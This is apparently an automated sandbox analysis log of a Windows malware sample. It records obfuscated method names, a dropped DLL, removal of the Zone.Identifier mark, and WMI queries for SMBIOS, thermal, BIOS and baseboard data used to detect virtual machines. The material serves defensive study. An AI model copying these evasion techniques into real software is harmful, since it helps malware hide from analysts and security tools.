              Source: 2.2.powershell.exe.2321d350000.3.raw.unpack, eYqf26Tq5XNYyFIqYl.csHigh entropy of concatenated method names: 'SfTZEmsxBCXLIBtpuGm', 'GlLdyOsnPL4fEv8dVvl', 'BG3VHhQ9uU', 'O0v3WNsdnPoFM3TEmZn', 'oREVnZsKvSWT0cmVLs1', 'MI3l1rsNpctGU3CygTl', 'HogWlesoJImsIbnLMct', 'FNZPTYsBuIRIr6M4LR9', 'pYVPYJsIrkCUGGkl6OW', 'cs3fhFsgIwTQf1XQ9RN'
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.dllJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Hides that the sample has been downloaded from the Internet (zone.identifier)
              Source: C:\Windows\explorer.exeFile opened: C:\Windows\Explorer.EXE:Zone.Identifier read attributes | deleteJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes)
              Source: C:\Windows\System32\svchost.exeWMI Queries: MSSmBios_RawSMBiosTables
              Source: C:\Windows\System32\svchost.exeWMI Queries: MSSmBios_RawSMBiosTables
              Source: C:\Windows\System32\svchost.exeWMI Queries: WDMClassesOfDriver.ClassName=&quot;MSSmBios_RawSMBiosTables&quot;,Driver=&quot;C:\\Windows\\system32\\kernelbase.dll[MofResourceName]&quot;,HighDateTime=30982926,LowDateTime=1699781275
              Source: C:\Windows\System32\svchost.exeWMI Queries: WDMClassesOfDriver.ClassName=&quot;MSSmBios_RawSMBiosTables&quot;,Driver=&quot;C:\\Windows\\system32\\kernelbase.dll[MofResourceName]&quot;,HighDateTime=30982926,LowDateTime=1699781275
              Source: C:\Windows\System32\svchost.exeWMI Queries: WDMClassesOfDriver.ClassName=&quot;MSSmBios_RawSMBiosTables&quot;,Driver=&quot;C:\\Windows\\system32\\kernelbase.dll[MofResourceName]&quot;,HighDateTime=30982968,LowDateTime=1311154843
              Source: C:\Windows\System32\svchost.exeWMI Queries: MSSmBios_RawSMBiosTables
              Source: C:\Windows\System32\svchost.exeWMI Queries: MSSmBios_RawSMBiosTables
              Source: C:\Windows\System32\svchost.exeWMI Queries: WDMClassesOfDriver.ClassName=&quot;MSSmBios_RawSMBiosTables&quot;,Driver=&quot;C:\\Windows\\system32\\en-US\\kernelbase.dll.mui[MofResourceName]&quot;,HighDateTime=30982926,LowDateTime=2562148143
              Queries temperature or sensor information (via WMI often done to detect virtual machines)
              Source: C:\Windows\System32\svchost.exeWMI Queries: MSAcpi_ThermalZoneTemperature
              Source: C:\Windows\System32\svchost.exeWMI Queries: MSAcpi_ThermalZoneTemperature
              Source: C:\Windows\System32\svchost.exeWMI Queries: WDMClassesOfDriver.ClassName=&quot;MSAcpi_ThermalZoneTemperature&quot;,Driver=&quot;C:\\Windows\\system32\\kernelbase.dll[MofResourceName]&quot;,HighDateTime=30982926,LowDateTime=1699781275
              Source: C:\Windows\System32\svchost.exeWMI Queries: WDMClassesOfDriver.ClassName=&quot;MSAcpi_ThermalZoneTemperature&quot;,Driver=&quot;C:\\Windows\\system32\\kernelbase.dll[MofResourceName]&quot;,HighDateTime=30982926,LowDateTime=1699781275
              Source: C:\Windows\System32\svchost.exeWMI Queries: WDMClassesOfDriver.ClassName=&quot;MSAcpi_ThermalZoneTemperature&quot;,Driver=&quot;C:\\Windows\\system32\\kernelbase.dll[MofResourceName]&quot;,HighDateTime=30982968,LowDateTime=1311154843
              Source: C:\Windows\System32\svchost.exeWMI Queries: MSAcpi_ThermalZoneTemperature
              Source: C:\Windows\System32\svchost.exeWMI Queries: MSAcpi_ThermalZoneTemperature
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeMemory allocated: 1320000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeMemory allocated: 2D20000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeMemory allocated: 2B20000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeMemory allocated: 51F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeMemory allocated: 61F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeMemory allocated: 6320000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeMemory allocated: 7320000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeMemory allocated: 7CA0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeMemory allocated: 8CA0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5069Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4759Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2417Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 6952Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 884Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 844Jump to behavior
              Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 2696Jump to behavior
              Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 1181Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.dllJump to dropped file
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exe TID: 7720Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3536Thread sleep count: 5069 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6148Thread sleep count: 4759 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3656Thread sleep time: -12912720851596678s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 7508Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 1936Thread sleep count: 2696 > 30Jump to behavior
              Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 1936Thread sleep count: 1181 > 30Jump to behavior
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: svchost.exe, 00000006.00000000.1390670833.0000023359D71000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Win32_PnPEntityMicrosoft Hyper-V Virtualization Infrastructure Driver{4d36e97d-e325-11ce-bfc1-08002be10318}Win32_PnPEntityMicrosoft Hyper-V Virtualization Infrastructure DriverROOT\VID\0000System.String[]MicrosoftMicrosoft Hyper-V Virtualization Infrastructure DriverSystemROOT\VID\0000VidOKWin32_ComputerSystemuser-PCBCAAEBA95E435CA5300A680BE9BF735F04A93ECECD18F46C56865C6158D43B74
              Source: svchost.exe, 00000006.00000000.1389598483.00000233593A7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1572016071.00000233593AA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Win32_CacheMemoryCache Memory 2nd unrestricted access to all features of Hyper-V.OK
              Source: svchost.exe, 00000006.00000003.1572954734.0000023359376000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
              Source: svchost.exe, 00000006.00000000.1390078269.0000023359743000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 6LU2AGRR VMCI Bus Device
              Source: svchost.exe, 00000006.00000003.1572954734.0000023359376000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: stringComputer System ProductComputer System ProductZXGBMD2ED92742-89DC-DD72-92E8-869FA5A66493VMware, Inc.None
              Source: svchost.exe, 00000006.00000000.1389598483.00000233593A7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1572016071.00000233593AA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1576483229.00000233593AF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: user-PC\Hyper-V Administrators
              Source: svchost.exe, 00000006.00000000.1390138450.000002335978B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Counter
